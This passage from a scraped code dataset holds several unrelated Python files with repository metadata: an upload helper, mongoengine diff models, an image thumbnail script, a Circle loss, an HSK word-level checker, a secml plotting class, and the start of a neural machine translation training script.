'NUL')\n\n\ndef stat_file(path):\n stats = os.stat(path)\n return stats[ST_SIZE], stats[ST_CTIME]\n\n\ndef chunk_reader(fobj, chunk_size=CHUNKSIZE):\n \"\"\"Generator that reads a file in chunks of bytes\n \"\"\"\n while True:\n chunk = fobj.read(chunk_size)\n if not chunk:\n return\n yield chunk\n\n\nclass FileIterable(object):\n\n def __init__(self, filename, filepath):\n self.filename = filename\n self.filepath = filepath\n\n def __iter__(self):\n with open(self.filepath, 'rb') as fd:\n for chunk in chunk_reader(fd):\n yield chunk\n\n\ndef digest(fobj, hash=hashlib.sha1):\n hashobj = hash()\n size = os.fstat(fobj.fileno()).st_size\n hashobj.update(b\"blob %i\\0\" % size)\n for chunk in chunk_reader(fobj):\n hashobj.update(chunk)\n fobj.seek(0)\n return hashobj.hexdigest()\n\n\ndef clean_filename(filename):\n \"\"\"Borrowed from Werkzeug : http://werkzeug.pocoo.org/\n \"\"\"\n for sep in os.path.sep, os.path.altsep:\n if sep:\n filename = filename.replace(sep, ' ')\n\n filename = filename.strip()\n\n # on nt a couple of special files are present in each folder. We\n # have to ensure that the target file is not such a filename. In\n # this case we prepend an underline\n if os.name == 'nt' and filename and \\\n filename.split('.')[0].upper() in _windows_device_files:\n filename = '_' + filename\n\n return filename.translate(remove_punctuation_map)\n\n\ndef persist_files(destination, *files):\n \"\"\"Document me.\n \"\"\"\n # digest registry\n \n digests = set()\n\n for item in files:\n digested = digest(item.file)\n if digested not in digests:\n digests.add(digested)\n filename = clean_filename(item.filename)\n path = os.path.join(destination, filename)\n with open(path, 'wb') as upload:\n shutil.copyfileobj(item.file, upload)\n size, date = stat_file(path)\n yield (digested, filename, size, date)\n","repo_name":"Cromlech/dolmen.api_engine","sub_path":"src/dolmen/api_engine/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33233299097","text":"# coding: utf-8\nimport uuid\nfrom datetime import datetime\n\nfrom mongoengine import (\n Document,\n UUIDField,\n StringField,\n DateTimeField,\n)\n\nfrom opac_proc.web import config\n\n\nclass BaseDiffModel(object):\n _id = UUIDField(primary_key=True, required=True, default=uuid.uuid4)\n uuid = UUIDField(required=True, default=uuid.uuid4)\n stage = StringField(max_length=20, required=True, default='default') # ex: 'extact' | 'transform' | 'load'\n collection_acronym = StringField(max_length=5, required=True, default=config.OPAC_PROC_COLLECTION)\n # campos de controle:\n created_at = DateTimeField()\n updated_at = DateTimeField()\n # ação a realizar: ADD | UPDATE | DELETE\n action = StringField(max_length=20)\n done_at = DateTimeField()\n\n def save(self, *args, **kwargs):\n if not self.created_at:\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n return super(BaseDiffModel, self).save(*args, **kwargs)\n\n\nclass CollectionDiffModel(BaseDiffModel, Document):\n meta = {\n 'collection': 'diff_collection',\n 'indexes': [\n 'uuid',\n 'collection_acronym',\n 'action',\n 'done_at',\n ]\n }\n\n def __unicode__(self):\n return self.collection_acronym\n\n\nclass JournalDiffModel(BaseDiffModel, Document):\n journal_issn = StringField(max_length=10, required=True)\n\n meta = {\n 'collection': 'diff_journal',\n 'indexes': [\n 'uuid',\n 'collection_acronym',\n 'journal_issn',\n 'action',\n 'done_at',\n ]\n }\n\n def __unicode__(self):\n return self.journal_issn\n\n\nclass IssueDiffModel(BaseDiffModel, Document):\n journal_issn = StringField(max_length=10, required=True)\n issue_pid = StringField(max_length=20, required=True)\n\n meta = {\n 'collection': 'diff_issue',\n 'indexes': [\n 'uuid',\n 'collection_acronym',\n 'journal_issn',\n 'issue_pid',\n 'action',\n 'done_at',\n ]\n }\n\n def __unicode__(self):\n return self.issue_pid\n\n\nclass ArticleDiffModel(BaseDiffModel, Document):\n journal_issn = StringField(max_length=10, required=True)\n issue_pid = StringField(max_length=20, required=True)\n article_pid = StringField(max_length=25, required=True)\n\n meta = {\n 'collection': 'diff_article',\n 'indexes': [\n 'uuid',\n 'collection_acronym',\n 'journal_issn',\n 'issue_pid',\n 'article_pid',\n 'action',\n 'done_at',\n ]\n }\n\n def __unicode__(self):\n return self.article_pid\n\n\nclass NewsDiffModel(BaseDiffModel, Document):\n url_id = StringField(max_length=256, required=True)\n\n meta = {\n 'collection': 'diff_news',\n 'indexes': [\n 'uuid',\n 'collection_acronym',\n 'url_id',\n 'action',\n 'done_at',\n ]\n }\n\n def __unicode__(self):\n return \"[lang: %s] url: %s\" % (self.lang, self.url_id)\n\n\nclass PressReleaseDiffModel(BaseDiffModel, Document):\n url_id = StringField(max_length=256, required=True)\n\n meta = {\n 'collection': 'diff_press_release',\n 'indexes': [\n 'uuid',\n 'collection_acronym',\n 'url_id',\n 'action',\n 'done_at',\n ]\n }\n\n def __unicode__(self):\n return self.url_id\n","repo_name":"scieloorg/opac_proc","sub_path":"opac_proc/datastore/diff_models.py","file_name":"diff_models.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"11388212597","text":"from PIL import Image, ImageFilter\r\n\r\nimg = Image.open('./astro.jpg')\r\nimg.thumbnail((400,400))\r\nimg.save('thumbnail.jpg')\r\nprint(img.size)\r\n#filtered_img = img.filter(ImageFilter.SHARPEN)\r\n# filtered_img = img.convert('L')\r\n# box = (100,100,400,400)\r\n# region = filtered_img.crop(box)\r\n# region.save(\"grey.png\", 'png')\r\n# #filtered_img.rotate(90)\r\n","repo_name":"sharansingh1/imageplayground","sub_path":"image-playground/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71704755927","text":"import torch\n\nfrom person_reid.loss.softmax_losses.base import SoftmaxLossMixin\n\n__all__ = ['Circle']\n\n\nclass Circle(SoftmaxLossMixin, torch.nn.Module):\n def __init__(self,\n in_features,\n out_features,\n m=0.25,\n gamma=256,\n loss_dict=SoftmaxLossMixin.DEFAULT_LOSS,\n *args, **kwargs):\n super(Circle, self).__init__()\n SoftmaxLossMixin.__init__(self, loss_dict)\n self.margin = m\n self.gamma = gamma\n self.class_num = out_features\n self.emdsize = in_features\n\n self.weight = torch.nn.Parameter(torch.FloatTensor(self.class_num, self.emdsize))\n torch.nn.init.xavier_uniform_(self.weight)\n\n def forward(self, input, label, *args, **kwargs):\n similarity_matrix = torch.nn.functional.linear(\n torch.nn.functional.normalize(input, p=2, dim=1, eps=1e-12),\n torch.nn.functional.normalize(self.weight, p=2, dim=1, eps=1e-12))\n\n one_hot = torch.zeros_like(similarity_matrix)\n one_hot.scatter_(1, label.view(-1, 1).long(), 1)\n one_hot = one_hot.type(dtype=torch.bool)\n # sp = torch.gather(similarity_matrix, dim=1, index=label.unsqueeze(1))\n sp = similarity_matrix[one_hot]\n mask = one_hot.logical_not()\n sn = similarity_matrix[mask]\n\n sp = sp.view(input.size()[0], -1)\n sn = sn.view(input.size()[0], -1)\n\n ap = torch.clamp_min(-sp.detach() + 1 + self.margin, min=0.)\n an = torch.clamp_min(sn.detach() + self.margin, min=0.)\n\n delta_p = 1 - self.margin\n delta_n = self.margin\n\n logit_p = - ap * (sp - delta_p) * self.gamma\n logit_n = an * (sn - delta_n) * self.gamma\n\n output = torch.logsumexp(logit_n, dim=1) + torch.logsumexp(logit_p, dim=1)\n\n return self._calc_loss(output, label)\n","repo_name":"JegernOUTT/reid_template","sub_path":"person_reid/loss/softmax_losses/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8114355994","text":"#!/usr/local/bin/python3\n\nimport pickle\nimport csv\nfrom sys import stdin\n\n#---LOARDING DICTIONARIES---#\n\nlevel1 = open(\"level1\",'rb')\ndefault_dict = pickle.load(level1)\nlevel2 = open(\"level2\",'rb')\ndefault_dict2 = pickle.load(level2)\nlevel3 = open(\"level3\",'rb')\ndefault_dict3 = pickle.load(level3)\nlevel4 = open(\"level4\",'rb')\ndefault_dict4 = pickle.load(level4)\nlevel5 = open(\"level5\",'rb')\ndefault_dict5 = pickle.load(level5)\n\nHSK_1 = open(\"HSK-1\",'rb')\nHSK_dict1 = pickle.load(HSK_1)\nHSK_2 = open(\"HSK-2\",'rb')\nHSK_dict2 = pickle.load(HSK_2)\nHSK_3 = open(\"HSK-3\",'rb')\nHSK_dict3 = pickle.load(HSK_3)\nHSK_4 = open(\"HSK-4\",'rb')\nHSK_dict4 = pickle.load(HSK_4)\nHSK_5 = open(\"HSK-5\",'rb')\nHSK_dict5 = pickle.load(HSK_5)\n\n#---CHECK FUNCTION FOR HSK Dictionary---#\ndef check(word):\n if word in HSK_dict1: print(\"HSK_level 1\")\n elif word in HSK_dict2: print(\"HSK_level 2\")\n elif word in HSK_dict3: print(\"HSK_level 3\")\n elif word in HSK_dict4: print(\"HSK_level 4\")\n elif word in HSK_dict5: print(\"HSK_level 5\")\n else: print()\n\nif __name__ == \"__main__\":\n used = []\n#---Get Data---MANUAL RENAME--#\n with open(\"TVJT stimuli.csv\") as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader: \n # VERB is the colunmn in CSV file which name \"verb\" #\n if row['verb'] not in used:\n used.append(row['verb'])\n string1 = row['Num_CL']\n # REMOVE ASPECT MARKER #\n if len(string1) >= 2:\n if string1[1:] not in used:\n used.append(string1[1:])\n # object is the column in the CSV file which name 'object' \n if row['object'] not in used:\n used.append(row['object'])\n\n#===Check Level===#\n for i in used:\n if i in default_dict: print(i,\":level 1\",end=\" \"); check(i) \n elif i in default_dict2: print(i,\":level 2\",end = \" \"); check(i)\n elif i in default_dict3: print(i,\":level 3\",end = \" \"); check(i)\n elif i in default_dict4: print(i,\":level 4\",end = \" \"); check(i)\n elif i in default_dict5: print(i,\":level 5\",end =\" \"); check(i)\n else: print(i,\":none\")\n","repo_name":"joyyyjen/Dictionary-Checker-for-Word-Difficulty","sub_path":"checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24258824171","text":"\"\"\"\n.. module:: CPlotFunction\n :synopsis: Function plots.\n\n.. moduleauthor:: Marco Melis \n.. moduleauthor:: Ambra Demontis \n\n\"\"\"\nfrom secml.figure._plots import CPlot\nfrom secml.figure._plots.plot_utils import create_points_grid\nfrom secml.array import CArray\nfrom secml.core.constants import inf\nfrom secml.core.type_utils import is_list\n\n\nclass CPlotFunction(CPlot):\n \"\"\"Plots a Function.\n\n Custom plotting parameters can be specified.\n\n Currently parameters default:\n - show_legend: True\n - grid: True\n\n See Also\n --------\n .CPlot : basic subplot functions.\n .CFigure : creates and handle figures.\n\n \"\"\"\n\n def apply_params_fun(self):\n \"\"\"Apply defined parameters to active subplot.\"\"\"\n fig_legend = self.get_legend()\n if self.show_legend is not False and fig_legend is not None:\n fig_legend.set_visible(True)\n self.grid(grid_on=True)\n\n def plot_fun(self, func, multipoint=False,\n plot_background=True, plot_levels=True,\n levels=None, levels_color='k', levels_style=None,\n levels_linewidth=1.0, n_colors=50, cmap='jet',\n alpha=1.0, alpha_levels=1.0, vmin=None, vmax=None,\n colorbar=True, n_grid_points=30,\n grid_limits=None, func_args=(), **func_kwargs):\n \"\"\"Plot a function (used for decision functions or boundaries).\n\n Parameters\n ----------\n func : unbound function\n Function to be plotted.\n multipoint : bool, optional\n If True, all grid points will be passed to the function.\n If False (default), function is iterated over each\n point of the grid.\n plot_background : bool, optional\n Specifies whether to plot the value of func at each point\n in the background using a colorbar.\n plot_levels : bool, optional\n Specify if function levels should be plotted (default True).\n levels : list or None, optional\n List of levels to be plotted.\n If None, 0 (zero) level will be plotted.\n levels_color : str or tuple or None, optional\n If None, the colormap specified by cmap will be used.\n If a string, like 'k', all levels will be plotted in this color.\n If a tuple of colors (string, float, rgb, etc),\n different levels will be plotted in different colors\n in the order specified. Default 'k'.\n levels_style : [ None | 'solid' | 'dashed' | 'dashdot' | 'dotted' ]\n If levels_style is None, the default is 'solid'.\n levels_style can also be an iterable of the above strings\n specifying a set of levels_style to be used. If this iterable\n is shorter than the number of contour levels it will be\n repeated as necessary.\n levels_linewidth : float or list of floats, optional\n The line width of the contour lines. Default 1.0.\n n_colors : int, optional\n Number of color levels of background plot. Default 50.\n cmap : str or list or `matplotlib.pyplot.cm`, optional\n Colormap to use (default 'jet'). Could be a list of colors.\n alpha : float, optional\n The alpha blending value of the background. Default 1.0.\n alpha_levels : float, optional\n The alpha blending value of the levels. Default 1.0.\n vmin, vmax : float or None, optional\n Limits of the colors used for function plotting.\n If None, colors are determined by the colormap.\n colorbar : bool, optional\n True if colorbar should be displayed.\n n_grid_points : int, optional\n Number of grid points.\n grid_limits : list of tuple, optional\n List with a tuple of min/max limits for each axis.\n If None, [(0, 1), (0, 1)] limits will be used.\n func_args, func_kwargs\n Other arguments or keyword arguments to pass to `func`.\n\n Examples\n --------\n .. plot:: pyplots/plot_fun.py\n :include-source:\n\n \"\"\"\n levels = [0] if levels is None else levels\n\n # create the grid of the point where the function will be evaluated\n pad_grid_point_features, pad_xgrid, pad_ygrid = \\\n create_points_grid(grid_limits, n_grid_points)\n\n # Evaluate function on each grid point\n if multipoint is True:\n grid_points_value = func(\n pad_grid_point_features, *func_args, **func_kwargs)\n else:\n grid_points_value = pad_grid_point_features.apply_along_axis(\n func, 1, *func_args, **func_kwargs)\n\n grid_points_val_reshaped = grid_points_value.reshape(\n (pad_xgrid.shape[0], pad_xgrid.shape[1]))\n\n # Clipping values to show a correct color plot\n clip_min = -inf if vmin is None else vmin\n clip_max = inf if vmax is None else vmax\n grid_points_val_reshaped = grid_points_val_reshaped.clip(\n clip_min, clip_max)\n\n if is_list(cmap): # Convert list of colors to colormap\n from matplotlib.colors import ListedColormap\n cmap = ListedColormap(cmap)\n\n ch = None\n if plot_background is True:\n # Draw a fully colored plot using 50 levels\n ch = self.contourf(pad_xgrid, pad_ygrid,\n grid_points_val_reshaped,\n n_colors, cmap=cmap, alpha=alpha,\n vmin=vmin, vmax=vmax, zorder=0)\n\n # Displaying 20 ticks on the colorbar\n if colorbar is True:\n some_y = CArray.linspace(\n grid_points_val_reshaped.min(),\n grid_points_val_reshaped.max(), 20)\n self.colorbar(ch, ticks=some_y)\n\n if plot_levels is True:\n self.contour(\n pad_xgrid, pad_ygrid, grid_points_val_reshaped,\n levels=levels, colors=levels_color, linestyles=levels_style,\n linewidths=levels_linewidth, alpha=alpha_levels)\n\n # Customizing figure\n self.apply_params_fun()\n\n return ch\n\n def plot_fgrads(self, gradf, n_grid_points=30, grid_limits=None,\n color='k', linestyle='-', linewidth=1.0, alpha=1.0,\n func_args=(), **func_kwargs):\n \"\"\"Plot function gradient directions.\n\n Parameters\n ----------\n gradf : function\n Function that computes gradient directions.\n n_grid_points : int\n Number of grid points.\n grid_limits : list of tuple\n List with a tuple of min/max limits for each axis.\n If None, [(0, 1), (0, 1)] limits will be used.\n color :\n Color of the gradient directions.\n linestyle : str\n ['solid' | 'dashed', 'dashdot', 'dotted' |\n (offset, on-off-dash-seq) | '-' | '--' | '-.' | ':' |\n 'None' | ' ' | '']\n linewidth : float\n Width of the line.\n alpha : float\n Transparency factor of the directions.\n func_args, func_kwargs : any\n Other arguments or keyword arguments to pass to `gradf`.\n\n \"\"\"\n # create the grid of the point where the function will be evaluated\n pad_grid_point_features, pad_xgrid, pad_ygrid = \\\n create_points_grid(grid_limits, n_grid_points)\n\n n_vals = pad_grid_point_features.shape[0]\n grad_point_values = CArray.zeros((n_vals, 2))\n # compute gradient on each grid point\n for p_idx in range(n_vals):\n grad_point_values[p_idx, :] = gradf(\n pad_grid_point_features[p_idx, :].ravel(),\n *func_args, **func_kwargs)\n\n U = grad_point_values[:, 0].reshape(\n (pad_xgrid.shape[0], pad_xgrid.shape[1]))\n V = grad_point_values[:, 1].reshape(\n (pad_xgrid.shape[0], pad_xgrid.shape[1]))\n\n self.quiver(U, V, pad_xgrid, pad_ygrid,\n color=color, linestyle=linestyle,\n linewidth=linewidth, alpha=alpha)\n\n # Customizing figure\n self.apply_params_fun()\n","repo_name":"pralab/secml","sub_path":"src/secml/figure/_plots/c_plot_fun.py","file_name":"c_plot_fun.py","file_ext":"py","file_size_in_byte":8278,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"31"} +{"seq_id":"33510831606","text":"from __future__ import division\n\nimport onmt\nimport onmt.markdown\nimport onmt.modules\nimport argparse\nimport torch\nimport time, datetime\nfrom onmt.train_utils.trainer import XETrainer\nfrom onmt.train_utils.trainer_zoo import XEAdversarialTrainer, XEGenderTrainer\nfrom onmt.modules.loss import NMTLossFunc, NMTAndCTCLossFunc, MSEEncoderLoss, CosineEncoderLoss, CrossEntropyLossBase\nfrom onmt.model_factory import build_model, optimize_model\nfrom options import make_parser\nfrom collections import defaultdict\nimport os\nimport numpy as np\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n\nparser = argparse.ArgumentParser(description='train.py')\nonmt.markdown.add_md_help_argument(parser)\n\n# Please look at the options file to see the options regarding models and data\nparser = make_parser(parser)\n\nopt = parser.parse_args()\n\nprint(opt)\n\n# An ugly hack to have weight norm on / off\nonmt.constants.weight_norm = opt.weight_norm\nonmt.constants.checkpointing = opt.checkpointing\nonmt.constants.max_position_length = opt.max_position_length\n\n# Use static dropout if checkpointing > 0\nif opt.checkpointing > 0:\n onmt.constants.static = True\n\nif torch.cuda.is_available() and not opt.gpus:\n print(\"WARNING: You have a CUDA device, should run with -gpus 0\")\n\ntorch.manual_seed(opt.seed)\n\n\ndef numpy_to_torch(tensor_list):\n\n out_list = list()\n\n for tensor in tensor_list:\n if isinstance(tensor, np.ndarray):\n out_list.append(torch.from_numpy(tensor))\n else:\n out_list.append(tensor)\n\n return out_list\n\n\ndef main():\n\n if not opt.multi_dataset:\n if opt.data_format in ['bin', 'raw']:\n start = time.time()\n\n if opt.data.endswith(\".train.pt\"):\n print(\"Loading data from '%s'\" % opt.data)\n dataset = torch.load(opt.data)\n else:\n print(\"Loading data from %s\" % opt.data + \".train.pt\")\n dataset = torch.load(opt.data + \".train.pt\")\n\n elapse = str(datetime.timedelta(seconds=int(time.time() - start)))\n print(\"Done after %s\" % elapse)\n\n dicts = dataset['dicts']\n\n # For backward compatibility\n train_dict = defaultdict(lambda: None, dataset['train'])\n valid_dict = defaultdict(lambda: None, dataset['valid'])\n\n if train_dict['src_lang'] is not None:\n assert 'langs' in dicts\n train_src_langs = train_dict['src_lang']\n train_tgt_langs = train_dict['tgt_lang']\n else:\n # allocate new languages\n dicts['langs'] = {'src': 0, 'tgt': 1}\n train_src_langs = list()\n train_tgt_langs = list()\n # Allocation one for the bilingual case\n train_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n train_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n if not opt.streaming:\n train_data = onmt.Dataset(train_dict['src'], train_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=train_src_langs, tgt_langs=train_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n token_level_lang=opt.language_classifier_tok,\n num_split=len(opt.gpus),\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n train_data = onmt.StreamDataset(train_dict['src'], train_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=train_src_langs, tgt_langs=train_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n en_id=opt.en_id)\n\n if valid_dict['src_lang'] is not None:\n assert 'langs' in dicts\n valid_src_langs = valid_dict['src_lang']\n valid_tgt_langs = valid_dict['tgt_lang']\n else:\n # allocate new languages\n valid_src_langs = list()\n valid_tgt_langs = list()\n\n # Allocation one for the bilingual case\n valid_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n valid_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n if not opt.streaming:\n valid_data = onmt.Dataset(valid_dict['src'], valid_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=valid_src_langs, tgt_langs=valid_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n upsampling=opt.upsampling,\n token_level_lang=opt.language_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n valid_data = onmt.StreamDataset(valid_dict['src'], valid_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=valid_src_langs, tgt_langs=valid_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n upsampling=opt.upsampling)\n\n print(' * number of training sentences. %d' % len(dataset['train']['src']))\n print(' * maximum batch size (words per batch). %d' % opt.batch_size_words)\n\n elif opt.data_format in ['scp', 'scpmem', 'mmem']:\n print(\"Loading memory mapped data files ....\")\n start = time.time()\n from onmt.data.mmap_indexed_dataset import MMapIndexedDataset\n from onmt.data.scp_dataset import SCPIndexDataset\n\n dicts = torch.load(opt.data + \".dict.pt\")\n if opt.data_format in ['scp', 'scpmem']:\n audio_data = torch.load(opt.data + \".scp_path.pt\")\n\n # allocate languages if not\n if 'langs' not in dicts:\n dicts['langs'] = {'src': 0, 'tgt': 1}\n else:\n print(dicts['langs'])\n\n train_path = opt.data + '.train'\n if opt.data_format in ['scp', 'scpmem']:\n train_src = SCPIndexDataset(audio_data['train'], concat=opt.concat)\n else:\n train_src = MMapIndexedDataset(train_path + '.src')\n\n train_tgt = MMapIndexedDataset(train_path + '.tgt')\n\n # check the lang files if they exist (in the case of multi-lingual models)\n if os.path.exists(train_path + '.src_lang.bin'):\n assert 'langs' in dicts\n train_src_langs = MMapIndexedDataset(train_path + '.src_lang')\n train_tgt_langs = MMapIndexedDataset(train_path + '.tgt_lang')\n else:\n train_src_langs = list()\n train_tgt_langs = list()\n # Allocate a Tensor(1) for the bilingual case\n train_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n train_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(train_path + '.gen_sent.bin'):\n assert 'gen_sent' in dicts\n train_gen_sent = MMapIndexedDataset(train_path + '.gen_sent')\n else:\n train_gen_sent = list()\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(train_path + '.gen_tok.bin'):\n assert 'gen_tok' in dicts\n train_gen_tok = MMapIndexedDataset(train_path + '.gen_tok')\n else:\n train_gen_tok = list()\n\n\n # check the length files if they exist\n if os.path.exists(train_path + '.src_sizes.npy'):\n train_src_sizes = np.load(train_path + '.src_sizes.npy')\n train_tgt_sizes = np.load(train_path + '.tgt_sizes.npy')\n else:\n train_src_sizes, train_tgt_sizes = None, None\n\n if opt.encoder_type == 'audio':\n data_type = 'audio'\n else:\n data_type = 'text'\n\n if not opt.streaming:\n if opt.gender_classifier:\n if opt.gender_classifier_tok:\n train_gen_data = train_gen_tok\n elif opt.gender_classifier_sent:\n train_gen_data = train_gen_sent\n else:\n raise NotImplementedError\n else:\n train_gen_data = None\n\n train_data = onmt.Dataset(train_src,\n train_tgt,\n train_src_sizes, train_tgt_sizes,\n train_src_langs, train_tgt_langs,\n train_gen_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n src_align_right=opt.src_align_right,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n cleaning=True, verbose=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n token_level_gen=opt.gender_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n train_data = onmt.StreamDataset(train_src,\n train_tgt,\n train_src_langs, train_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=False,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n upsampling=opt.upsampling)\n\n valid_path = opt.data + '.valid'\n if opt.data_format in ['scp', 'scpmem']:\n valid_src = SCPIndexDataset(audio_data['valid'], concat=opt.concat)\n else:\n valid_src = MMapIndexedDataset(valid_path + '.src')\n valid_tgt = MMapIndexedDataset(valid_path + '.tgt')\n\n if os.path.exists(valid_path + '.src_lang.bin'):\n assert 'langs' in dicts\n valid_src_langs = MMapIndexedDataset(valid_path + '.src_lang')\n valid_tgt_langs = MMapIndexedDataset(valid_path + '.tgt_lang')\n else:\n valid_src_langs = list()\n valid_tgt_langs = list()\n\n # Allocation one for the bilingual case\n valid_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n valid_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(valid_path + '.gen_sent.bin'):\n assert 'gen_sent' in dicts\n valid_gen_sent = MMapIndexedDataset(valid_path + '.gen_sent')\n else:\n valid_gen_sent = list()\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(valid_path + '.gen_tok.bin'):\n assert 'gen_tok' in dicts\n valid_gen_tok = MMapIndexedDataset(valid_path + '.gen_tok')\n else:\n valid_gen_tok = list()\n\n\n # check the length files if they exist\n if os.path.exists(valid_path + '.src_sizes.npy'):\n valid_src_sizes = np.load(valid_path + '.src_sizes.npy')\n valid_tgt_sizes = np.load(valid_path + '.tgt_sizes.npy')\n else:\n valid_src_sizes, valid_tgt_sizes = None, None\n\n if not opt.streaming:\n if opt.gender_classifier:\n if opt.gender_classifier_tok:\n valid_gen_data = valid_gen_tok\n elif opt.gender_classifier_sent:\n valid_gen_data = valid_gen_sent\n else:\n raise NotImplementedError\n else:\n valid_gen_data = None\n valid_data = onmt.Dataset(valid_src, valid_tgt,\n valid_src_sizes, valid_tgt_sizes,\n valid_src_langs, valid_tgt_langs,\n valid_gen_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n src_align_right=opt.src_align_right,\n cleaning=True, verbose=True, debug=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n token_level_gen=opt.gender_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n # for validation data, we have to go through sentences (very slow but to ensure correctness)\n valid_data = onmt.StreamDataset(valid_src, valid_tgt,\n valid_src_langs, valid_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents)\n\n elapse = str(datetime.timedelta(seconds=int(time.time() - start)))\n print(\"Done after %s\" % elapse)\n\n else:\n raise NotImplementedError\n\n print(' * number of sentences in training data: %d' % train_data.size())\n print(' * number of sentences in validation data: %d' % valid_data.size())\n\n else:\n print(\"[INFO] Reading multiple dataset ...\")\n # raise NotImplementedError\n\n dicts = torch.load(opt.data + \".dict.pt\")\n\n root_dir = os.path.dirname(opt.data)\n print(dicts['langs'])\n print(\"Loading training data ...\")\n\n train_dirs, valid_dirs = dict(), dict()\n\n # scan the data directory to find the training data\n for dir_ in os.listdir(root_dir):\n if os.path.isdir(os.path.join(root_dir, dir_)):\n if str(dir_).startswith(\"train\"):\n idx = int(dir_.split(\".\")[1])\n train_dirs[idx] = dir_\n if dir_.startswith(\"valid\"):\n idx = int(dir_.split(\".\")[1])\n valid_dirs[idx] = dir_\n\n train_sets, valid_sets = list(), list()\n\n for (idx_, dir_) in sorted(train_dirs.items()):\n\n data_dir = os.path.join(root_dir, dir_)\n print(\"[INFO] Loading training data %i from %s\" % (idx_, dir_))\n\n if opt.data_format in ['bin', 'raw']:\n raise NotImplementedError\n\n elif opt.data_format in ['scp', 'scpmem', 'mmem']:\n from onmt.data.mmap_indexed_dataset import MMapIndexedDataset\n from onmt.data.scp_dataset import SCPIndexDataset\n\n if opt.data_format in ['scp', 'scpmem']:\n audio_data = torch.load(os.path.join(data_dir, \"data.scp_path.pt\"))\n src_data = SCPIndexDataset(audio_data, concat=opt.concat)\n else:\n src_data = MMapIndexedDataset(os.path.join(data_dir, \"data.src\"))\n\n tgt_data = MMapIndexedDataset(os.path.join(data_dir, \"data.tgt\"))\n\n src_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.src_lang'))\n tgt_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.tgt_lang'))\n\n if os.path.exists(os.path.join(data_dir, 'data.src_sizes.npy')):\n src_sizes = np.load(os.path.join(data_dir, 'data.src_sizes.npy'))\n tgt_sizes = np.load(os.path.join(data_dir, 'data.tgt_sizes.npy'))\n else:\n src_sizes, sizes = None, None\n\n if opt.encoder_type == 'audio':\n data_type = 'audio'\n else:\n data_type = 'text'\n\n if not opt.streaming:\n train_data = onmt.Dataset(src_data,\n tgt_data,\n src_sizes, tgt_sizes,\n src_lang_data, tgt_lang_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n src_align_right=opt.src_align_right,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n cleaning=True, verbose=True,\n num_split=len(opt.gpus),\n 